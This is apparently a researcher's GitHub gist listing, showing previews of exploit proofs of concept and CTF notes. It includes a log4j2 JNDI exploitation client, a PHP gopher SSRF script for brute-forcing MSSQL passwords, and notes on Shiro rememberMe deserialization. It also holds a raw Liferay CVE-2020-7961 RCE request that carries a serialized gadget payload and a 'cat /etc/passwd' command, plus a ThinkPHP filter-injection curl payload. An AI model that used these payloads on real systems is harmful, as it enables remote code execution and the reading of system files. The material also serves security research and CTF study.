
@kaiili
kaiili / check_local_listen_port.py
Created July 4, 2022 02:46
List the processes listening on local ports
from psutil import Process, net_connections
from requests import get
from rich import print


def check_port_ishttp(port: int) -> bool:
    """Check whether the given local port speaks HTTP."""
    url = f"http://127.0.0.1:{port}"
    try:
@kaiili
kaiili / check.js
Last active March 22, 2022 23:40
a QL rule that matches HTTP request URLs concatenated from variables
var v = "/?"
const c = "/?"
const axios = require('axios').default;
var a = "http://q.co"
var a1 = "http://q.co" + "/?a"
var a2 = a + "/?a"
var a3 = a.concat("/?a")
var a4 = a + v
var a5 = a + c
@kaiili
kaiili / client.java
Created December 10, 2021 08:36
Exploiting log4j2 on newer JDK versions. ldapWithCB1.java is the malicious LDAP server. client.java is the log4j2 PoC. tcp.go is a TCP logger used to quickly detect whether log4j makes a request.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Main {
    private static final Logger LOGGER = LogManager.getLogger();

    public static void main(String[] args) {
        // Enabling com.sun.jndi.ldap.object.trustURLCodebase makes it exploitable
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // RMI no longer performs the lookup once a path is appended
        // LDAP + deserialization works
@kaiili
kaiili / mssql_boom.php
Created November 22, 2021 04:32
PHP SSRF brute-forcing an MSSQL password over the gopher protocol, from @stereotype32.
<?php
// Ported from impacket's encryptPassword.
// As you see, encrypting the password does not change its size, so it is much easier to craft the packet.
function encryptPassword($password) {
    $result = "";
    for ($i = 0; $i < strlen($password); $i++) {
        $tmp = ord($password[$i]);
        // echo $tmp;
        $tmp = ((($tmp & 0x0f) << 4) + (($tmp & 0xf0) >> 4)) ^ 0xa5;
@kaiili
kaiili / ShiroWithTomcatehco.md
Created November 12, 2021 12:53
Shiro deserialization with Spring Boot output echo.

1 From deserialization to code execution

1.1 Deserialization

Shiro uses AES to encrypt a serialized object as the rememberMe cookie; once the encryption key is known, a valid cookie can be generated.
public static String AesCbcEncrypt(byte[] plainText, String key) throws Exception {
    byte[] k = Base64.getDecoder().decode(key);
    byte[] ivBytes = new byte[16];
@kaiili
kaiili / eth.md
Created September 25, 2021 15:03
Archived notes from a blockchain security talk

1. Blockchain worldview (30 min)

1.1 Categories:

Currencies (exchange tokens, decentralized currencies), NFT, DeFi, Polkadot, decentralized storage

Communities: blockchain communities and cryptocurrency communities

1.2 toolchain:

@kaiili
kaiili / LiferayRCE(CVE-2020-7961).md
Created February 5, 2021 08:05 — forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap
@kaiili
kaiili / main.go
Created December 26, 2020 09:53
huaweictf 2020
package main

import (
    "bytes"
    "crypto/aes"
    "encoding/hex"
    "fmt"
    "math/rand"
    "os"
    "time"
@kaiili
kaiili / oldjs.md
Last active January 20, 2021 13:35
Notes on oldjs

[TOC]

oldjs

@kaiili
kaiili / Esay_tp5.md
Created October 22, 2020 05:05
kaii's notes for nu1l ctf 2020

1. Initial idea: 1. use set_error_handler to knock out TP's error handling (done)

curl "http://127.0.0.1/?s=index/index" -d "a=var_dump&s=-1&_method=__construct&method=GET&filter[0]=var_dump&filter[1]=set_exception_handler&filter[2]=kaii" > .\Desktop\2.html

2. assert("phpinfo()"), but the passed argument then became null.